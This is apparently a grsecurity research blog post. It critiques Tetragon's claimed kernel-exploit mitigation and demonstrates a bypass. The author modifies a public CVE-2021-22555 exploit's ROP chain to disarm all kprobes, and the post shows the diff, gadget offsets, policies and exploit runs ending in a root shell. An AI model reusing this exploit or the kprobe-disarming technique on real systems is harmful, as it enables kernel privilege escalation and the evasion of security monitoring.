grsecurity - Tetragone: A Lesson in Security Fundamentals

Introduction

The story began with a tweet about a new eBPF-based Security Observability and Runtime Enforcement solution, named Tetragon, posted by the CTO of the company (Isovalent) that created it.

With a very cute logo, eBPF, Kubernetes, and a real-time Linux kernel runtime security enforcer capable of hooking into all layers of the operating system and application stack, the solution seemed to hit the ground running right from the start. All the features the tool provides are listed on its website [1].

The "transparent security observability across the stack from the lower level up into the applications. File access, networking, storage, syscalls, escalations, function tracers, ..." sounds interesting, but what really caught our eye was the enforcement capabilities.

On the website, in the section "Automatic Mitigation of Privilege & Container Escapes", the authors claim that "Tetragon adds the ability to prevent privilege, capability, and namespace escalations in the kernel by detecting them and stopping the involved processes".

To demonstrate its effectiveness, the authors show a portion of an apparently simple policy that is supposed to automatically detect a capability change to CAP_SYS_ADMIN and kill the responsible process. As a worthy opponent, an exploit (authored by theflow) for the CVE-2021-22555 vulnerability [5] in the Linux kernel had been selected. CVE-2021-22555 is a Netfilter bug leading to privilege escalation; more about it can be found in an excellent write-up at [7].

The original version of the Tetragon blog post showed how the exploit process gets killed upon executing the execve() system call with the escalated privilege, which was quickly pointed out to be far too late [2]. Now, the authors claim to be using a similar policy attached to all system calls, in order to catch and kill the exploit earlier. Why the change? We will discuss it in the next section. Regardless of the exact policy and exact moment of detecting the escalation, the exploit process gets ultimately killed. That is excellent, right!?

Well, there is a small (read: huge) caveat that the authors of the Tetragon blog post perhaps unknowingly admit: "The process was killed right when the vulnerability was exploited to escalate privileges". "vulnerability was exploited"?! This can't be good.

Why it can't work

To quickly recap the situation: in attempting to mitigate container escapes, Tetragon tries using advanced Linux kernel features like eBPF and kprobes not to protect the very same kernel from getting exploited, but instead to stop an already successful exploit from using its gains.

Going back to security fundamentals, this approach is simply infeasible: post-exploitation detection/mitigation is at the mercy of an exploit writer putting little to no effort into avoiding tripping these detection mechanisms. To illustrate this point, it helps to think in terms of the graphic below:

Graphic showing the range of potential for an exploit at different stages

At point 1, a defense employs methods like attack surface reduction to prevent a vulnerability from being reached in the first place. This is highly (even perfectly) effective where it is possible. Once a vulnerability can be triggered, however, an attacker will invoke a series of steps in order to achieve both greater reliability and greater control over the vulnerability. The initial steps (points 2 and 3) are precarious and essential: disrupting these either requires significant reworking of the exploit or renders it infeasible (due to a high probability of detection), impossible without an additional vulnerability, or simply impossible.

As illustrated in the graphic, the further along the exploit is able to operate in achieving that reliability and control, the more possibilities (size of the circles in the graphic) open up for it at a lower marginal cost to the attacker. In the case of the exploit used for Tetragon's demo in its blog, the exploit was able to achieve ROP, allowing it to execute any code in the kernel, modify any memory -- the possibilities are virtually endless. The attacker is in full control of the environment in which Tetragon attempts to perform its enforcement actions.

The core message here is: Tetragon (in its aspect of post-exploitation container escape mitigation) simply tries to address the problem too late.

Post-exploitation "effectiveness"

In its container escape defense, Tetragon aims for a post-exploitation "mitigation". In order to be even slightly successful without strong and comprehensive pre-exploitation defenses/hardening, it has to adhere to certain principles. We can evaluate Tetragon's effectiveness here by looking at modern principles for its closest post-exploitation comparison: integrity checking / anti-persistence.

First, one can only expect some guarantees from a higher privilege level component monitoring or enforcing policies for a lower privilege level component (for example: OS kernel vs user-land programs). Let's call it "privilege domain separation".

Second, "Nemo iudex in causa sua": there must be role separation between a monitoring/enforcing component and the one being watched. One cannot expect any reasonable guarantees from a component monitoring or enforcing policies on itself, regardless of the component's privilege level, once an attacker has significant control over that component.

How does Tetragon adhere to the basic principles (in the example above specifically)? Tetragon tries to use Linux kernel privilege level features (eBPF/kprobes) to enforce security policies on... the Linux kernel.

This immediately brings to mind another realm of security software: old-style Antivirus (AV). What Tetragon claims to do is no different from an AV vendor with only a userland hook library injected into malware processes, claiming to be able to detect or stop malware, when the malware gets to run first.

Simply, after compromising the core controller, using that (already compromised!) controller's features to mitigate the already successful attack just can't work out well. Furthermore, it does not matter how fine-grained the applied policy might be, it cannot reliably mitigate against a kernel memory corruption bug and all the opportunities it gives to the attacker. To quote Mathias Krause: "When you give control to the weird machine, it is game over".

An attacker can use all sorts of evasion/bypass techniques. Some of them might become a standard part of any exploit by default. Let's take a look at the original exploit used in the Tetragon demonstration. By default, it very effectively avoids a handful of popular mitigations:

W^X - avoided by using ROP
SMEP - avoided by using ROP
SMAP - avoided by using data in sprayed kernel-land objects only

Knowing if the mitigation is or is not enabled oftentimes does not make any big difference. An attacker can simply assume it is there and accommodate the exploit to bypass it just in case. For instance, in the example exploit, one doesn't need to actually confirm the presence of an SMAP-capable CPU before using a technique that avoids tripping over SMAP. The same is the case for Tetragon.

There is, however, a significant difference between the mitigations listed above and Tetragon. Ideally, useful pre-exploitation mitigations should require, at minimum, significant reworking of exploits and not allow an attacker to circumvent them by generally-applicable additions to an exploit library. They stand in the way of successful or reliable exploitation before or while it occurs. Tetragon, however, does not prevent the exploitation at all (it does not make the W^X, SMEP or SMAP bypasses any harder); it lets it happen and hopes to be able to detect the fallout. It just cannot do that very well (or at all, to be frank), because at this point it is fully at the mercy of the attacker, who can quite easily (deliberately or accidentally) wipe out all of Tetragon's capabilities right away. Since the attacker can, the attacker will.

Mitigation side-effects

Speaking of the fine-grained policy: additional hooks, checks, probes and the like come at a cost. Adding more and more is not free, as the performance hit quickly becomes non-negligible. This fact, the above "effectiveness" discussion and the realization that runtime hooks cannot do better than in-source or compiler-applied mitigations together undermine the whole claim of Tetragon being the "Automatic Mitigation of Privilege & Container Escapes" solution. Another concern might be the correctness of the policy application. One cannot sprinkle the Linux kernel with haphazardly-chosen probes and hooks without a deeper understanding of the contexts the code might run in. For example, how does one handle locking correctly at all times without deeper analysis of the source code? It may turn out that a potential policy can only be reliably attached to well-defined interfaces in the kernel, and ideally to those with a relatively low execution frequency (performance matters too).

What can Tetragon do?

Tetragon could be useful for attack surface reduction, preventing user-land programs from leveraging certain interfaces they do not need. If a thorough analysis of a published security vulnerability is performed, it could also, like live-patching or other approaches, be capable of preventing that specific known vulnerability from being reached. But its post-exploitation mitigation certainly cannot be expected, in general, to mitigate or even reliably detect kernel-level exploits.

The exploit(s)

First of all, full disclosure: if you expected that I did something sophisticated for the exploit part that an average attacker would not have been able to figure out, you will be disappointed.

The ordeal - Tetragon setup

Setting up Tetragon was the most challenging part of this effort. The instructions available at the GitHub repo [3] seem to focus on the Kubernetes use case and do not describe the involved components, the available tools or how to use them very well. I will spare readers all the gory details of this struggle. Suffice it to say, I finally managed to get it to work after building it, running the daemon according to the Development Guide [4] and discovering the tetra CLI tool to manage policies.

The fun - doing the bypass

At this point, I had a working Tetragon setup, with policies that actually get enforced:

wipawel@esx2-ubnt-20-04-02:~/tetragon$ sudo LD_LIBRARY_PATH=$(realpath ./lib) ./tetragon --bpf-lib bpf/objs --btf /home/wipawel/git/tetragon/vmlinux-5.8.0-48-generic --enable-process-cred --enable-process-ns 
[...]
time="2022-05-21T12:37:37+02:00" level=info msg="Loaded BPF maps and events for sensor successfully" sensor=__main__
time="2022-05-21T12:37:37+02:00" level=info msg="Using metadata file" metadata=/home/wipawel/git/tetragon/vmlinux-5.8.0-48-generic
time="2022-05-21T12:37:37+02:00" level=info msg="Loading sensor" name=__main__
time="2022-05-21T12:37:37+02:00" level=info msg="Loading kernel version 5.8.18"
time="2022-05-21T12:37:37+02:00" level=info msg="Loaded BPF maps and events for sensor successfully" sensor=__main__
time="2022-05-21T12:37:37+02:00" level=info msg="Listening for events..."

I created a policy that was supposedly similar to the one used in the Tetragon blog post demo (unfortunately, the crucial part was missing from the policy in the Tetragon blog):

apiVersion: cilium.io/v1alpha1
kind: TracingPolicy
metadata:
  name: "capability-protection"
spec:
  kprobes:
  - call: "__x64_sys_execve"
    syscall: true 
    selectors:
    - matchCapabilityChanges:
      - type: Effective
        operator: In
        values:
        - "CAP_SYS_ADMIN"
      matchActions:
      - action: Sigkill
  - call: "do_execve"
    syscall: false
    selectors:
    - matchCapabilityChanges:
      - type: Effective
        operator: In
        values:
        - "CAP_SYS_ADMIN"
      matchActions:
      - action: Sigkill
  - call: "commit_creds"
    syscall: false
    selectors:
    - matchCapabilityChanges:
      - type: Effective
        operator: In
        values:
        - "CAP_SYS_ADMIN"
      matchActions:
      - action: Sigkill

and applied it using tetra:

wipawel@esx2-ubnt-20-04-02:~/tetragon$ ./tetra tracingpolicy add exec.yaml 
time="2022-05-21T12:37:47+02:00" level=info msg="Added generic kprobe sensor: bpf/objs/bpf_generic_kprobe_v53.o -> __x64_sys_execve"
time="2022-05-21T12:37:47+02:00" level=info msg="Added generic kprobe sensor: bpf/objs/bpf_generic_kprobe_v53.o -> do_execve"
time="2022-05-21T12:37:47+02:00" level=info msg="Added generic kprobe sensor: bpf/objs/bpf_generic_kprobe_v53.o -> commit_creds"
time="2022-05-21T12:37:47+02:00" level=info msg="Using metadata file" metadata=/home/wipawel/git/tetragon/vmlinux-5.8.0-48-generic
time="2022-05-21T12:37:47+02:00" level=info msg="Loading sensor" name=__generic_kprobe_sensors__
time="2022-05-21T12:37:47+02:00" level=info msg="Loading kernel version 5.8.18"
time="2022-05-21T12:37:47+02:00" level=info msg="Load probe" Program=bpf/objs/bpf_generic_kprobe_v53.o Type=generic_kprobe
bpf tetragon_kprobe_calls map and progs /sys/fs/bpf/tcpmon/kprobe___x64_sys_execve mapfd 104
time="2022-05-21T12:37:47+02:00" level=info msg="Loaded generic kprobe sensor: bpf/objs/bpf_generic_kprobe_v53.o -> __x64_sys_execve"
time="2022-05-21T12:37:47+02:00" level=info msg="BPF prog was loaded" label=kprobe/generic_kprobe prog=bpf/objs/bpf_generic_kprobe_v53.o
time="2022-05-21T12:37:47+02:00" level=info msg="Load probe" Program=bpf/objs/bpf_generic_kprobe_v53.o Type=generic_kprobe
bpf tetragon_kprobe_calls map and progs /sys/fs/bpf/tcpmon/kprobe_do_execve mapfd 106
time="2022-05-21T12:37:48+02:00" level=info msg="Loaded generic kprobe sensor: bpf/objs/bpf_generic_kprobe_v53.o -> do_execve"
time="2022-05-21T12:37:48+02:00" level=info msg="BPF prog was loaded" label=kprobe/generic_kprobe prog=bpf/objs/bpf_generic_kprobe_v53.o
time="2022-05-21T12:37:48+02:00" level=info msg="Load probe" Program=bpf/objs/bpf_generic_kprobe_v53.o Type=generic_kprobe
bpf tetragon_kprobe_calls map and progs /sys/fs/bpf/tcpmon/kprobe_commit_creds mapfd 108
time="2022-05-21T12:37:48+02:00" level=info msg="Loaded generic kprobe sensor: bpf/objs/bpf_generic_kprobe_v53.o -> commit_creds"
time="2022-05-21T12:37:48+02:00" level=info msg="BPF prog was loaded" label=kprobe/generic_kprobe prog=bpf/objs/bpf_generic_kprobe_v53.o
time="2022-05-21T12:37:48+02:00" level=info msg="Loaded BPF maps and events for sensor successfully" sensor=__generic_kprobe_sensors__

Running the original exploit proved that it got killed at the same spot as presented in the blog:

wipawel@esx2-ubnt-20-04-02:~$ ./exploit
[+] Linux Privilege Escalation by theflow@ - 2021

[+] STAGE 0: Initialization
[*] Setting up namespace sandbox...
[*] Initializing sockets and message queues...

[+] STAGE 1: Memory corruption
[*] Spraying primary messages...
[*] Spraying secondary messages...
[*] Creating holes in primary messages...
[*] Triggering out-of-bounds write...
[*] Searching for corrupted primary message...
[+] fake_idx: 804
[+] real_idx: 7f2

[+] STAGE 2: SMAP bypass
[*] Freeing real secondary message...
[*] Spraying fake secondary messages...
[*] Leaking adjacent secondary message...
[+] kheap_addr: ffff92bc6e099000
[*] Freeing fake secondary messages...
[*] Spraying fake secondary messages...
[*] Leaking primary message...
[+] kheap_addr: ffff92bc6e420000

[+] STAGE 3: KASLR bypass
[*] Freeing fake secondary messages...
[*] Spraying fake secondary messages...
[*] Freeing sk_buff data buffer...
[*] Spraying pipe_buffer objects...
[*] Leaking and freeing pipe_buffer object...
[+] anon_pipe_buf_ops: ffffffffb7278380
[+] kbase_addr: ffffffffb6200000

[+] STAGE 4: Kernel code execution
[*] Spraying fake pipe_buffer objects...
[*] Releasing pipe_buffer objects...
Killed

Finally! Now we can get to the juice.

How to bypass Tetragon?

The team immediately proposed a number of feasible ideas, but it was early Friday afternoon and I really wanted to finish the bypass before the end of the business day. So I wanted the easiest bypass I could spot quickly, one requiring as few modifications to the original exploit as possible.

What is the easiest way of controlling Linux kernel runtime behavior? The sysctl of course...

wipawel@esx2-ubnt-20-04-02:~/tetragon$ sudo sysctl -a|grep -i bpf
[sudo] password for wipawel: 
kernel.bpf_stats_enabled = 0
kernel.unprivileged_bpf_disabled = 0
net.core.bpf_jit_enable = 1
net.core.bpf_jit_harden = 0
net.core.bpf_jit_kallsyms = 1
net.core.bpf_jit_limit = 264241152

Nothing in there.

What is the second easiest way? The sysfs...

I went into the /sys/fs/bpf directory to look around but did not find anything particularly useful. But, at this moment something clicked in my mind: Tetragon uses kprobes! Look at the log entry:

time="2022-05-21T12:37:47+02:00" level=info msg="Load probe" Program=bpf/objs/bpf_generic_kprobe_v53.o Type=generic_kprobe
bpf tetragon_kprobe_calls map and progs /sys/fs/bpf/tcpmon/kprobe_do_execve mapfd 106

I knew what to do with it.

root@esx2-ubnt-20-04-02:/# cd /sys/kernel/debug/kprobes/
root@esx2-ubnt-20-04-02:/sys/kernel/debug/kprobes# ls
blacklist  enabled  list

There is a general kprobes kill-switch exposed via debugfs (mounted under /sys/kernel/debug)!
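For reference, this is the same switch an administrator can flip from a root shell by writing 0 or 1 to the enabled file. A minimal user-space sketch in C follows. The helper name set_kprobes_enabled() is mine, and the path is passed in as a parameter so the helper can be tried against a scratch file rather than the real switch.

```c
#include <assert.h>
#include <stdio.h>

/* Location of the global kprobes switch when debugfs is mounted at
 * /sys/kernel/debug. Writing to it normally requires root. */
#define KPROBES_ENABLED_PATH "/sys/kernel/debug/kprobes/enabled"

/*
 * Write "1" (arm) or "0" (disarm) to the switch file at `path`.
 * Returns 0 on success, -1 if the file cannot be opened or written.
 */
int set_kprobes_enabled(const char *path, int enable)
{
    assert(path != NULL);

    FILE *f = fopen(path, "w");
    if (f == NULL)
        return -1;

    int ok = fputs(enable ? "1" : "0", f) >= 0;
    if (fclose(f) != 0)   /* the write may only fail at flush time */
        ok = 0;
    return ok ? 0 : -1;
}
```

Calling set_kprobes_enabled(KPROBES_ENABLED_PATH, 0) as root would be the user-space equivalent of what the exploit does from inside the kernel later on.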

Let's take a look at the kernel function attached to the enabled file:

In kernel/kprobes.c:

static ssize_t write_enabled_file_bool(struct file *file,
               const char __user *user_buf, size_t count, loff_t *ppos)
{
        char buf[32];
        size_t buf_size;
        int ret = 0;

        buf_size = min(count, (sizeof(buf)-1));
        if (copy_from_user(buf, user_buf, buf_size))
                return -EFAULT;

        buf[buf_size] = '\0';
        switch (buf[0]) {
        case 'y':
        case 'Y':
        case '1':
                ret = arm_all_kprobes();
                break;
        case 'n':
        case 'N':
        case '0':
                ret = disarm_all_kprobes();
                break;
        default:
                return -EINVAL;
        }

        if (ret)
                return ret;

        return count;
}

static const struct file_operations fops_kp = {
        .read =         read_enabled_file_bool,
        .write =        write_enabled_file_bool,
        .llseek =       default_llseek,
};

Notice the disarm_all_kprobes() function. That is the solution I was looking for: simple, effective and even persistent.
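To make the handler's behavior easier to see, here is a user-space model of its decision logic. It is a sketch, not kernel code: model_enabled_write() and the kprobes_action enum are hypothetical names, and memcpy() stands in for copy_from_user(). Two things stand out: only the first byte of the input matters, and count is clamped to 31 bytes.

```c
#include <assert.h>
#include <errno.h>
#include <stddef.h>
#include <string.h>

enum kprobes_action { KPROBES_DISARM = 0, KPROBES_ARM = 1 };

/*
 * Model of the input handling in write_enabled_file_bool().
 * Returns KPROBES_ARM or KPROBES_DISARM, or -EINVAL for unrecognized input.
 * `*copied` receives the number of bytes the handler would copy.
 * The caller must provide at least min(count, 31) readable bytes.
 */
int model_enabled_write(const char *user_buf, size_t count, size_t *copied)
{
    char buf[32];
    size_t buf_size = count < sizeof(buf) - 1 ? count : sizeof(buf) - 1;

    assert(user_buf != NULL && copied != NULL);

    memcpy(buf, user_buf, buf_size);  /* stands in for copy_from_user() */
    buf[buf_size] = '\0';
    *copied = buf_size;

    switch (buf[0]) {                 /* only the first byte is inspected */
    case 'y': case 'Y': case '1':
        return KPROBES_ARM;
    case 'n': case 'N': case '0':
        return KPROBES_DISARM;
    default:
        return -EINVAL;
    }
}
```

In this model, any count of 1 or more with a leading 'n' selects the disarm path, which is why the handler is so forgiving about the exact size passed in.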

Unfortunately, in the Ubuntu kernel 5.8.0-48-generic the disarm_all_kprobes() function is inlined, so calling it directly via the exploit's ROP would be cumbersome (for an early Friday afternoon). Hence I decided to call the write_enabled_file_bool() function directly. It takes four parameters:

struct file *file - which is not used, can be NULL
const char __user *user_buf - indicating the parameters ('y'/'n' to enable/disable the kprobes)
size_t count - indicating size of the parameter passed
loff_t *ppos - offset that is not used and can be NULL

Also, notice how convenient this function is: although it needs a string to disable kprobes, it copies that string directly from user-space itself via copy_from_user() (it is a debugfs file handler after all!). So, there is no problem as far as SMAP is concerned.

Now, time to add the write_enabled_file_bool() invocation to the ROP chain of theflow's exploit:

--- exploit.c    2022-05-21 12:37:05.379811547 +0200
+++ exploit_mod.c    2022-05-21 12:37:01.145040789 +0200
@@ -158,6 +158,9 @@
 // 0xffffffff810005ae : pop rbp ; ret
 #define POP_RBP_RET 0x5AE

+// 0xffffffff810ffb88: pop rdx; pop rbp; ret;
+#define POP_RDX_RBP_RET 0xFFB88
+
 // 0xffffffff81557894 : mov rdi, rax ; jne 0xffffffff81557888 ; xor eax, eax ; ret
 #define MOV_RDI_RAX_JNE_XOR_EAX_EAX_RET 0x557894
 // 0xffffffff810724db : cmp rcx, 4 ; jne 0xffffffff810724c0 ; pop rbp ; ret
@@ -167,6 +170,7 @@
 #define SWITCH_TASK_NAMESPACES 0xC7A50
 #define COMMIT_CREDS 0xC8C80
 #define PREPARE_KERNEL_CRED 0xC9110
+#define WRITE_ENABLED_FILE_BOOL 0x17E050

 #define ANON_PIPE_BUF_OPS 0x1078380
 #define INIT_NSPROXY 0x1663080
@@ -322,6 +326,8 @@
   return 0;
 }

+const char *disable = "n";
+
 // Note: Must not touch offset 0x10-0x18.
 void build_krop(char *buf, uint64_t kbase_addr, uint64_t scratchpad_addr) {
   uint64_t *rop;
@@ -396,6 +402,17 @@
   *rop++ = kbase_addr + MOV_RDI_RAX_JNE_XOR_EAX_EAX_RET;
   *rop++ = kbase_addr + COMMIT_CREDS;

+  *rop++ = kbase_addr + POP_RDI_RET;
+  *rop++ = 0; // RDI
+  *rop++ = kbase_addr + POP_RSI_RET;
+  *rop++ = (uint64_t)disable; // RSI
+  *rop++ = kbase_addr + POP_RDX_RBP_RET;
+  *rop++ = 1; // RDX (popped first)
+  *rop++ = 0xDEADBEEF; // RBP (popped second)
+  *rop++ = kbase_addr + POP_RCX_RET;
+  *rop++ = 0; // RCX
+  *rop++ = kbase_addr + WRITE_ENABLED_FILE_BOOL;
+
   // switch_task_namespaces(find_task_by_vpid(1), init_nsproxy)
   *rop++ = kbase_addr + POP_RDI_RET;
   *rop++ = 1; // RDI

All I had to do was populate the four parameters of the function. For that, I had RDI, RSI and RCX gadgets already present in the original exploit code. I needed to find another one for RDX. This task was done with ropper within five minutes. I decided to use a POP_RDX_RBP_RET gadget located in the .text section at offset 0xFFB88.
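The offsets in the diff are relative to the kernel base, which KASLR randomizes on every boot. The arithmetic can be sketched as follows, using the anon_pipe_buf_ops address leaked in the run above and the offsets from the diff. The helper names are hypothetical, and the offsets are specific to this particular Ubuntu 5.8.0-48-generic build.

```c
#include <assert.h>
#include <stdint.h>

/* Offsets relative to the kernel base, taken from the exploit diff. */
#define ANON_PIPE_BUF_OPS        0x1078380ULL
#define POP_RDX_RBP_RET          0xFFB88ULL
#define WRITE_ENABLED_FILE_BOOL  0x17E050ULL

/* Recover the randomized kernel base from a leaked pointer to a known symbol. */
uint64_t kernel_base_from_leak(uint64_t leaked_addr, uint64_t symbol_offset)
{
    assert(leaked_addr >= symbol_offset);
    return leaked_addr - symbol_offset;
}

/* Translate a build-specific offset into an address valid for this boot. */
uint64_t runtime_addr(uint64_t kbase, uint64_t offset)
{
    return kbase + offset;
}
```

With the leaked value 0xffffffffb7278380, the base comes out as 0xffffffffb6200000 (matching the kbase_addr line in the output), which puts the new gadget at 0xffffffffb62ffb88 and write_enabled_file_bool() at 0xffffffffb637e050.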

RDI, holding the file pointer, can be 0. RSI holds the user-land address of the disable string I put in there. RDX, corresponding to the count parameter, holds the size of the string (1 char). RCX, for the ppos offset, can be 0 as well.
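Under the System V AMD64 calling convention, the first four integer arguments travel in RDI, RSI, RDX and RCX, and a "pop ...; ret" gadget consumes stack slots in instruction order. The toy model below illustrates how a chain of such gadgets fills the argument registers. It is a simulation under simplifying assumptions, not exploit code: gadget "addresses" are replaced by small table indices, and all names are hypothetical.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

enum reg { RDI, RSI, RDX, RCX, RBP, NREGS };

/* A "pop ...; ret" gadget: the registers it pops, in instruction order. */
struct gadget {
    size_t npops;
    enum reg pops[2];
};

/* Indices stand in for gadget addresses; G_CALL_TARGET ends the chain. */
enum { G_POP_RDI, G_POP_RSI, G_POP_RDX_RBP, G_POP_RCX, G_CALL_TARGET };

static const struct gadget gadgets[] = {
    [G_POP_RDI]     = { 1, { RDI } },
    [G_POP_RSI]     = { 1, { RSI } },
    [G_POP_RDX_RBP] = { 2, { RDX, RBP } },
    [G_POP_RCX]     = { 1, { RCX } },
};

/*
 * Walk the fake stack the way `ret` and `pop` would: every gadget slot is
 * followed by the values that gadget pops. Stops at G_CALL_TARGET and
 * returns the number of slots consumed; regs[] then holds the arguments.
 */
size_t run_chain(const uint64_t *stack, size_t len, uint64_t regs[NREGS])
{
    size_t sp = 0;

    while (sp < len) {
        uint64_t id = stack[sp++];           /* `ret` loads the next gadget */
        if (id == G_CALL_TARGET)
            break;
        assert(id < G_CALL_TARGET);

        const struct gadget *g = &gadgets[id];
        for (size_t i = 0; i < g->npops; i++) {
            assert(sp < len);
            regs[g->pops[i]] = stack[sp++];  /* each `pop` takes one slot */
        }
    }
    return sp;
}
```

Feeding it the slots { G_POP_RDI, 0, G_POP_RSI, addr, G_POP_RDX_RBP, 1, 0xDEADBEEF, G_POP_RCX, 0, G_CALL_TARGET } leaves RDX holding 1 and RBP holding the filler value: for a "pop rdx; pop rbp; ret" gadget, the slot right after the gadget address is the one that lands in RDX.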

With these modifications, I compiled the exploit, and voila:

wipawel@esx2-ubnt-20-04-02:~$ ./exploit_mod 
[+] Linux Privilege Escalation by theflow@ - 2021

[+] STAGE 0: Initialization
[*] Setting up namespace sandbox...
[*] Initializing sockets and message queues...

[+] STAGE 1: Memory corruption
[*] Spraying primary messages...
[*] Spraying secondary messages...
[*] Creating holes in primary messages...
[*] Triggering out-of-bounds write...
[*] Searching for corrupted primary message...
[+] fake_idx: bf9
[+] real_idx: bc5

[+] STAGE 2: SMAP bypass
[*] Freeing real secondary message...
[*] Spraying fake secondary messages...
[*] Leaking adjacent secondary message...
[+] kheap_addr: ffff92bc6a3b0000
[*] Freeing fake secondary messages...
[*] Spraying fake secondary messages...
[*] Leaking primary message...
[+] kheap_addr: ffff92bc69a90000

[+] STAGE 3: KASLR bypass
[*] Freeing fake secondary messages...
[*] Spraying fake secondary messages...
[*] Freeing sk_buff data buffer...
[*] Spraying pipe_buffer objects...
[*] Leaking and freeing pipe_buffer object...
[+] anon_pipe_buf_ops: ffffffffb7278380
[+] kbase_addr: ffffffffb6200000

[+] STAGE 4: Kernel code execution
[*] Spraying fake pipe_buffer objects...
[*] Releasing pipe_buffer objects...
[*] Checking for root...
[+] Root privileges gained.

[+] STAGE 5: Post-exploitation
[*] Escaping container...
[*] Cleaning up...
[*] Popping root shell...
root@esx2-ubnt-20-04-02:/#

Tetragon has been successfully bypassed within circa 2 hours after first setting it up (which took nearly two days).

There is also a nice side-effect of the write_enabled_file_bool() (ab)use: it keeps the kprobes disarmed and disabled. All other Tetragon policies using kprobes will not work until the kprobes are re-enabled. Even policies newly added to Tetragon do not work, because of the disabled kprobes.
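The disarmed state can be observed from user space by reading the same enabled file, which reports 1 or 0. A minimal sketch follows; the helper name kprobes_globally_enabled() is mine, and the path is a parameter so the helper can be tried on a scratch file. Keep in mind that this only observes the state: an attacker who controls the kernel also controls what this file reports.

```c
#include <assert.h>
#include <stdio.h>

/*
 * Read the global kprobes switch at `path`
 * (normally /sys/kernel/debug/kprobes/enabled, readable by root).
 * Returns 1 if kprobes are armed, 0 if they are disarmed,
 * and -1 if the file cannot be read or holds something unexpected.
 */
int kprobes_globally_enabled(const char *path)
{
    assert(path != NULL);

    FILE *f = fopen(path, "r");
    if (f == NULL)
        return -1;

    int c = fgetc(f);   /* the file holds '0' or '1' followed by a newline */
    fclose(f);

    if (c == '1')
        return 1;
    if (c == '0')
        return 0;
    return -1;
}
```

After the modified exploit has run, such a check on the real file would be expected to return 0 until someone writes 1 back to it.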

Tetragon really became Tetragone.

Just in case one wonders if adding the CAP_SYS_ADMIN capability change check to the write_enabled_file_bool() function would solve the problem, notice that at the point this function is called, the privilege has been already elevated and hence such a check would be bogus.

Funny twist of events

After publishing the outcome of this effort on Twitter, the Isovalent CTO came back accusing me of playing unfair, because I did not publish the policy I used. That was a rather bold move, because they did not publish theirs either in the first place. I asked if he could publish the one they used. He agreed and provided it (from [6]):

apiVersion: cilium.io/v1alpha1
kind: TracingPolicy
metadata:
  name: "capability-change"
spec:
  kprobes:
  - call: "__close_fd"
    syscall: false
    args:
    - index: 0
      type: "nop"
    - index: 1
      type: "nop"
    selectors:
    - matchCapabilities:
      - type: Effective
        operator: In
        values:
        - "CAP_SYS_ADMIN"
      matchCapabilityChanges:
      - type: Effective
        operator: In
        values:
        - "CAP_SYS_ADMIN"
      matchActions:
      - action: Sigkill
        argError: 0
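To make the two selectors more concrete, here is a small model of what "has CAP_SYS_ADMIN" and "gained CAP_SYS_ADMIN" could mean on an effective capability bitmask. This is my reading of the selectors' intent, not Tetragon's implementation; the function names are hypothetical. The only hard fact used is that CAP_SYS_ADMIN is capability number 21 in linux/capability.h.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

/* Value of CAP_SYS_ADMIN in <linux/capability.h>. */
#define CAP_SYS_ADMIN_NR 21

/* Bitmask with only capability `cap` set. */
static uint64_t cap_bit(unsigned int cap)
{
    assert(cap < 64);
    return UINT64_C(1) << cap;
}

/* Assumed matchCapabilities-style test: is the capability in the set now? */
bool cap_present(uint64_t effective, unsigned int cap)
{
    return (effective & cap_bit(cap)) != 0;
}

/* Assumed matchCapabilityChanges-style test: absent before, present now. */
bool cap_gained(uint64_t before, uint64_t after, unsigned int cap)
{
    return !cap_present(before, cap) && cap_present(after, cap);
}
```

Whatever the exact semantics, a check like this can only fire if the probe carrying it actually runs after the escalation.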

Notice that it is unlikely to be the original policy they used, as the initial one in the blog targeted the execve() syscall while the updated one targeted the close() syscall where the actual escalation occurred (ignore the open() error in the quote below).

From the Tetragon website [1]:

Image of a hasty/inaccurate edit to the Tetragon blog

But, never mind. Let's try the exploit against it:

wipawel@esx2-ubnt-20-04-02:~/tetragon$ ./tetra tracingpolicy add close.yaml 

time="2022-05-21T13:58:21+02:00" level=warning msg="kprobe spec validation: type (struct files_struct *) of argument 0 does not match spec type (nop)\n"
time="2022-05-21T13:58:21+02:00" level=info msg="Added generic kprobe sensor: bpf/objs/bpf_generic_kprobe_v53.o -> __close_fd"
time="2022-05-21T13:58:21+02:00" level=info msg="Using metadata file" metadata=/home/wipawel/git/tetragon/vmlinux-5.8.0-48-generic
time="2022-05-21T13:58:21+02:00" level=info msg="Loading sensor" name=__generic_kprobe_sensors__
time="2022-05-21T13:58:21+02:00" level=info msg="Loading kernel version 5.8.18"
time="2022-05-21T13:58:21+02:00" level=info msg="Load probe" Program=bpf/objs/bpf_generic_kprobe_v53.o Type=generic_kprobe
bpf tetragon_kprobe_calls map and progs /sys/fs/bpf/tcpmon/kprobe___close_fd mapfd 110
time="2022-05-21T13:58:22+02:00" level=info msg="Loaded generic kprobe sensor: bpf/objs/bpf_generic_kprobe_v53.o -> __close_fd"
time="2022-05-21T13:58:22+02:00" level=info msg="BPF prog was loaded" label=kprobe/generic_kprobe prog=bpf/objs/bpf_generic_kprobe_v53.o
time="2022-05-21T13:58:22+02:00" level=info msg="Loaded BPF maps and events for sensor successfully" sensor=__generic_kprobe_sensors__

wipawel@esx2-ubnt-20-04-02:~$ ./exploit_mod 
[+] Linux Privilege Escalation by theflow@ - 2021

[+] STAGE 0: Initialization
[*] Setting up namespace sandbox...
[*] Initializing sockets and message queues...

[+] STAGE 1: Memory corruption
[*] Spraying primary messages...
[*] Spraying secondary messages...
[*] Creating holes in primary messages...
[*] Triggering out-of-bounds write...
[*] Searching for corrupted primary message...
[+] fake_idx: 801
[+] real_idx: 7ec

[+] STAGE 2: SMAP bypass
[*] Freeing real secondary message...
[*] Spraying fake secondary messages...
[*] Leaking adjacent secondary message...
[+] kheap_addr: ffff92bc653de000
[*] Freeing fake secondary messages...
[*] Spraying fake secondary messages...
[*] Leaking primary message...
[+] kheap_addr: ffff92bc64590000

[+] STAGE 3: KASLR bypass
[*] Freeing fake secondary messages...
[*] Spraying fake secondary messages...
[*] Freeing sk_buff data buffer...
[*] Spraying pipe_buffer objects...
[*] Leaking and freeing pipe_buffer object...
[+] anon_pipe_buf_ops: ffffffffb7278380
[+] kbase_addr: ffffffffb6200000

[+] STAGE 4: Kernel code execution
[*] Spraying fake pipe_buffer objects...
[*] Releasing pipe_buffer objects...
[*] Checking for root...
[+] Root privileges gained.

[+] STAGE 5: Post-exploitation
[*] Escaping container...
[*] Cleaning up...
[*] Popping root shell...
root@esx2-ubnt-20-04-02:/#

Still works! But, I like to be thorough. Let's reboot the box and try again.

